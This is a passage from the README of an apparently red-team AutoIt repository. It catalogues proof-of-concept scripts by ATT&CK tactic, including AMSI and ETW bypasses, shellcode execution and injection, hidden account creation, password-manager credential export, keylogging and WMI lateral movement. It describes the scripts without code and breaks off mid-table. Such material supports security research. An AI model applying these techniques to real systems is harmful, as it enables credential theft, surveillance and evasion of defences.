OffensiveAutoIt

Offensive tooling notes and experiments in AutoIt v3.

Table of Contents

• OffensiveAutoIt
  • Why AutoIt?
  • OffensiveAutoIt scripts
  • Using AutoIt scripts
    • Compiling scripts into standalone executables
    • Using scripts without compilation into executables
      • AutoIt3.exe
      • AutoItX
  • Setting up a dev environment
    • Debugging
  • Decompiling AutoIt executables
    • Decompiling .a3x files
  • Obfuscating scripts
  • AutoIt in the wild
  • Detection
    • YARA rules
    • Miscellaneous
  • Blog posts
  • AutoIt project references

Why AutoIt?

• Plenty of examples online showing AutoIt being utilized for malware development but no general resource I could find that security folk new to the language can use to explore its capabilities and nuances.
• Ability to directly call external DLL and Windows API functions.
• Scripts can be executed using AutoIt3.exe (digitally signed binary) or compiled into standalone executables.
• Simplifies UI automation and interaction; GUI creation, simulating keystrokes and mouse movements, manipulating windows and processes.
• Very active community and countless user defined functions (UDFs).
• I love byt3bl33d3r's OffensiveNim repo and wanted to have a go at developing/researching tradecraft in a language that I wasn't familiar with.

OffensiveAutoIt scripts

The examples in this repo are purely PoCs; I've tested them, but not thoroughly. The scripts are intended to be compiled and used as standalone console application executables but it's not the only way they can be utilized.

Execution (TA0002)

| Script | Description | ATT&CK Reference | | :------ | :---------- | :----------- | | ExecutePowershell.au3 | Hosts the CLR, bypasses AMSI & executes PowerShell through an unmanaged runspace. More info available in this post. | T1059.001 | | ExecuteAssembly.au3 | Hosts the CLR, patches AMSI & ETW and executes a .NET assembly from memory. NOTE: This script doesn't support assembly arguments at the moment (WIP). More info available in this post. | T1027.002<br>T1218 | | MSScriptControl.au3 | Executes JScript and VBScript using the MSScriptControl COM object. Direct port of scriptcontrol_bin.nim by byt3bl33d3r. | T1059.007<br>T1059.005 | | ExcelCOM.au3 | Executes shellcode using the Excel COM object and VBA macros. Direct port of excel_com_bin.nim by byt3bl33d3r. | T1059.005 |

Persistence (TA0003)

| Script | Description | ATT&CK Reference | | :------ | :---------- | :----------- | | NetUserAdd.au3 | Uses the NetUserAdd API to create a new computer/machine account. The user will be hidden in the control panel and from the net user/wmic commands. Adapted from DoUCMe by Ben0xA. | T1136.001 |

Defense Evasion (TA0005)

| Script | Description | ATT&CK Reference | | :------ | :---------- | :----------- | | PatchAMSI.au3 | Bypasses AMSI by patching amsi.dll. | T1562.001 | | PatchETW.au3 | Patches ETW out of the current process. | T1562.006 |

Credential Access (TA0006)

| Script | Description | ATT&CK Reference | | :------ | :---------- | :----------- | | MiniDump.au3 | Dumps process memory to a file on disk using the MiniDumpWriteDump API. | T1003.001 | | KeePassCredExport-1.au3 | Exports credentials from an unlocked KeePass2 database to disk using UI automation & key presses. Reference blog post here. | T1555.005 | | KeePassCredExport-2.au3 | Exports credentials from an unlocked KeePass2 database to disk using UI automation & key presses. Contains user idle time check. Reference blog post here. | T1555.005 | | BitwardenCredExport.au3 | Exports Bitwarden vault credentials to disk using UI automation & key presses. Requires Bitwarden's master password. Reference blog post here. | T1555.005 | | 1PasswordCredExport.au3 | Exports 1Password vault credentials to disk using UI automation & key presses. Contains user input and visual block during extraction. Requires 1Password's master password and admin privileges on target PC. Reference blog post here. | T1555.005 |

Discovery (TA0007)

| Script | Description | ATT&CK Reference | | :------ | :---------- | :----------- | | WMIEnum.au3 | Enumerates basic info about a Windows host using WMI. | T1047 |

Lateral Movement (TA0008)

| Script | Description | ATT&CK Reference | | :------ | :---------- | :----------- | | WMICommand.au3 | Executes a command on a remote computer using WMI. | T1047 |

Collection (TA0009)

| Script | Description | ATT&CK Reference | | :------ | :---------- | :----------- | | Keylogger.au3 | Logs a user's keystrokes using AutoIt's IsPressed function. | T1056.001 | | ScreenCapture.au3 | Takes a screenshot and saves it in the user's temp directory. | T1113 | | ClipboardMonitor.au3 | Periodically monitors the clipboard for text and prints the content to stdout. | T1115 |

Process Injection (T1055)

| Script | Description | ATT&CK Reference | | :------ | :---------- | :----------- | | DLLInjection.au3 | Injects a DLL file on disk into a remote process. | T1055.001 | | CreateRemoteThread.au3 | Injects shellcode into a remote process using the CreateRemoteThread API. | T1055.002 | | QueueUserAPC.au3 | Injects shellcode into a target executable us